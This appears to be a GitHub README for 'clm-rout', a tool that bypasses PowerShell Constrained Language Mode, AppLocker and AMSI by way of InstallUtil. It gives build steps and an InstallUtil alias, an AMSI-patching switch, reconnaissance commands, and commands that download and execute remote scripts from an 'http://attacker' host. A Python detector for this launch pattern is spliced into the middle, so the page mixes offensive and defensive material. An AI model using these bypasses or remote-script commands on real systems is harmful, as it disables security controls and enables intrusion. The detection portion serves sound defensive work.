An all-in-one bypass for PowerShell Constrained Language Mode (CLM), AppLocker and Antimalware Scan Interface (AMSI) using Runspace.
- Evade AppLocker.
- Evade CLM.
- Patch AMSI via the `/patch` command switch.
- Execute command(s) via the `/cmd=<cmd>` command switch.
- Load and execute remotely hosted script(s) via the `/url=<http(s)://foo.bar/foobar>` command switch.
- Output the results of commands/scripts (supports `stdout` and `stderr`).
- Clone/download `clm-rout`:

  ```shell
  git clone https://github.com/aress31/clm-rout
  ```

- Build the project with Visual Studio 2022.
- (Recommended) Create an "alias":

  ```powershell
  function run {
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe `
          /uninstall /logfile= /LogToConsole=false `
          /patch $Args `
          C:\users\foo\CLMRout.exe
  }
  ```

- Execute command(s):

  ```powershell
  run /cmd="hostname; whoami"
  ```

- Execute remote script(s):

  ```powershell
  run /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
  ```

- Execute remote script(s) followed by command(s):

  ```powershell
  run /cmd="hostname; whoami" /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
  ```
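The launch pattern the alias above relies on (InstallUtil run with the quiet-uninstall switches against an arbitrary assembly) is visible in process-creation telemetry. As an added defensive example that is not part of clm-rout, this Python flags such invocations in constructed command-line samples; the trusted-path allow-list and the equal treatment of `/u` and `/uninstall` are assumptions.

```python
import ntpath
import re

# Switches this README documents for its InstallUtil launch: the "uninstall
# quietly" trio and the tool's own switches. /u and /uninstall are assumed
# to be equivalent spellings of the same InstallUtil switch.
QUIET_SWITCHES = {"/uninstall", "/u", "/logfile=", "/logtoconsole=false"}
TOOL_SWITCHES = ("/patch", "/cmd=", "/url=", "/script=")
# Assumed allow-list of locations a legitimately installed service would live in.
TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows")

# Constructed command lines in the shape of a 4688 / Sysmon EID 1 CommandLine field.
SAMPLE_EVENTS = [
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /uninstall /logfile= '
    r'/LogToConsole=false /patch /cmd="hostname; whoami" C:\users\foo\CLMRout.exe',
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /i "C:\Program Files\Vendor\Service.exe"',
    r'C:\Windows\System32\notepad.exe C:\users\foo\notes.txt',
    r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /u /LogToConsole=false '
    r'/logfile= C:\Users\Public\loader.exe',
]

def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted runs (even mid-token) intact."""
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]

def analyze(cmdline):
    """Return the reasons a command line matches the InstallUtil proxy-execution pattern."""
    tokens = tokenize(cmdline)
    if not tokens or ntpath.basename(tokens[0]).lower() != "installutil.exe":
        return []
    reasons = []
    lowered = [t.lower() for t in tokens[1:]]
    quiet = [t for t in lowered if t in QUIET_SWITCHES]
    if any(t in ("/uninstall", "/u") for t in quiet):
        reasons.append("uninstall switches: " + " ".join(quiet))
    tool = [t for t in lowered if t.startswith(TOOL_SWITCHES)]
    if tool:
        reasons.append("clm-rout style switches: " + " ".join(tool))
    # The assembly InstallUtil loads is the positional argument (no leading slash).
    for target in (t for t in tokens[1:] if not t.startswith("/")):
        if not target.lower().startswith(TRUSTED_PREFIXES):
            reasons.append("assembly outside trusted paths: " + target)
    return reasons

def scan(events=SAMPLE_EVENTS):
    """Map event index -> reasons for every event that fired."""
    return {i: analyze(e) for i, e in enumerate(events) if analyze(e)}
```

Running `scan()` on the samples fires only on the two InstallUtil uninstall launches pointed at user-writable paths, not on the vendor service uninstall or the notepad launch.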
If you want to support this project and appreciate the time invested in developing, maintaining and extending it, consider donating toward my next (cup of coffee/lamborghini) - as a lot of my personal time went into creating this project.
It is easy, all you have to do is press the Sponsor button at the top of this page or alternatively click this link.
Found a bug? I would love to squash it!
Please report all issues on the GitHub issues tracker.
Would you like to contribute to improve this project?
Please submit all PRs on the GitHub pull requests tracker.
`clm-rout` is distributed under the terms of the BSD 3 license.
See LICENSE for details.